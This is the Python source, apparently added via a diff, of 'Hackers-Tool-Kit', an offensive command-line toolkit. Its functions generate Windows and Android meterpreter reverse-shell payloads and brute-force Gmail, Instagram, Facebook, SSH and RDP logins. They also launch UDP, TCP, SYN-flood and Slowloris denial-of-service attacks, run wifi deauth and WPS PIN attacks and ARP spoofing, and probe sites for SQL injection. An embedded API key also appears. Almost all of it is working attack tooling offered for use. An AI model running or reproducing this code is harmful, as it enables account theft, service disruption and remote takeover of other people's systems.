ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file ] +phpload : make a php reverse_tcp payload and start it in a multi handler +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + 